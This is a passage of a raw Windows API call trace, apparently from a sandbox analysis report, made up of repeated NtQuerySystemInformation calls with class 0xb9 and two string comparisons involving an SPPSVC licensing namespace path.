Length=0x0, ResultLength=0x0) [0229.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd190, Length=0x28, ResultLength=0x0) [0229.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd190, Length=0x28, ResultLength=0x0) [0229.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd190, Length=0x28, ResultLength=0x0) [0229.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd200, Length=0x28, ResultLength=0x0) [0229.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd360, Length=0x38, ResultLength=0x0) [0229.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x28, ResultLength=0x0) [0229.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x28, ResultLength=0x0) [0229.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x20, ResultLength=0x0) [0229.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x20, ResultLength=0x0) [0229.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x20, ResultLength=0x0) [0229.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x20, ResultLength=0x0) [0229.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd360, Length=0x38, ResultLength=0x0) [0229.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd360, Length=0x38, ResultLength=0x0) [0229.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1e0, Length=0x20, ResultLength=0x0) [0229.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x20, ResultLength=0x0) [0229.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x20, ResultLength=0x0) [0229.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd790, Length=0x50, ResultLength=0x0) [0229.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd790, Length=0x50, ResultLength=0x0) [0229.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd790, Length=0x50, ResultLength=0x0) [0229.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd680, Length=0x50, ResultLength=0x0) [0229.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd680, Length=0x50, ResultLength=0x0) [0229.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd680, Length=0x50, ResultLength=0x0) [0229.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd680, Length=0x50, ResultLength=0x0) [0229.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5b0, Length=0x38, ResultLength=0x0) [0229.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3e0, Length=0x28, ResultLength=0x0) [0229.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3e0, Length=0x28, ResultLength=0x0) [0229.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3e0, Length=0x28, ResultLength=0x0) [0229.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd450, Length=0x28, ResultLength=0x0) [0229.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5b0, Length=0x38, ResultLength=0x0) [0229.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4d0, Length=0x28, ResultLength=0x0) [0229.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4d0, Length=0x28, ResultLength=0x0) [0229.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5b0, Length=0x38, ResultLength=0x0) [0229.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd430, Length=0x20, ResultLength=0x0) [0229.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3b0, Length=0x20, ResultLength=0x0) [0229.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3b0, Length=0x20, ResultLength=0x0) [0229.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3b0, Length=0x20, ResultLength=0x0) [0229.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5b0, Length=0x38, ResultLength=0x0) [0229.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd430, Length=0x20, ResultLength=0x0) [0229.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3c0, Length=0x20, ResultLength=0x0) [0229.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3c0, Length=0x20, ResultLength=0x0) [0229.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd790, Length=0x50, ResultLength=0x0) [0229.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd790, Length=0x50, ResultLength=0x0) [0229.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd790, Length=0x50, ResultLength=0x0) [0229.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd680, Length=0x50, ResultLength=0x0) [0229.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd680, Length=0x50, ResultLength=0x0) [0229.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd680, Length=0x50, ResultLength=0x0) [0229.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.245] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd680, Length=0x50, ResultLength=0x0) [0229.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.246] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5b0, Length=0x38, ResultLength=0x0) [0229.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3e0, Length=0x28, ResultLength=0x0) [0229.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3e0, Length=0x28, ResultLength=0x0) [0229.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3e0, Length=0x28, ResultLength=0x0) [0229.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd450, Length=0x28, ResultLength=0x0) [0229.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5b0, Length=0x38, ResultLength=0x0) [0229.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4d0, Length=0x28, ResultLength=0x0) [0229.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4d0, Length=0x28, ResultLength=0x0) [0229.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5b0, Length=0x38, ResultLength=0x0) [0229.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd430, Length=0x20, ResultLength=0x0) [0229.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3b0, Length=0x20, ResultLength=0x0) [0229.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.253] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3b0, Length=0x20, ResultLength=0x0) [0229.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3b0, Length=0x20, ResultLength=0x0) [0229.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5b0, Length=0x38, ResultLength=0x0) [0229.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd430, Length=0x20, ResultLength=0x0) [0229.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3c0, Length=0x20, ResultLength=0x0) [0229.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3c0, Length=0x20, ResultLength=0x0) [0229.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.254] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd840, Length=0x50, ResultLength=0x0) [0229.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd7c0, Length=0x28, ResultLength=0x0) [0229.255] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0229.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd840, Length=0x50, ResultLength=0x0) [0229.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd840, Length=0x50, ResultLength=0x0) [0229.255] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd840, Length=0x50, ResultLength=0x0) [0229.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd770, Length=0x38, ResultLength=0x0) [0229.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5a0, Length=0x28, ResultLength=0x0) [0229.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5a0, Length=0x28, ResultLength=0x0) [0229.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5a0, Length=0x28, ResultLength=0x0) [0229.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd610, Length=0x28, ResultLength=0x0) [0229.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd770, Length=0x38, ResultLength=0x0) [0229.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd690, Length=0x28, ResultLength=0x0) [0229.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd690, Length=0x28, ResultLength=0x0) [0229.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd770, Length=0x38, ResultLength=0x0) [0229.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5f0, Length=0x20, ResultLength=0x0) [0229.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd570, Length=0x20, ResultLength=0x0) [0229.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd570, Length=0x20, ResultLength=0x0) [0229.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd570, Length=0x20, ResultLength=0x0) [0229.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.264] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd770, Length=0x38, ResultLength=0x0) [0229.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5f0, Length=0x20, ResultLength=0x0) [0229.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd580, Length=0x20, ResultLength=0x0) [0229.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd580, Length=0x20, ResultLength=0x0) [0229.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd840, Length=0x50, ResultLength=0x0) [0229.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd7c0, Length=0x28, ResultLength=0x0) [0229.266] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0229.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 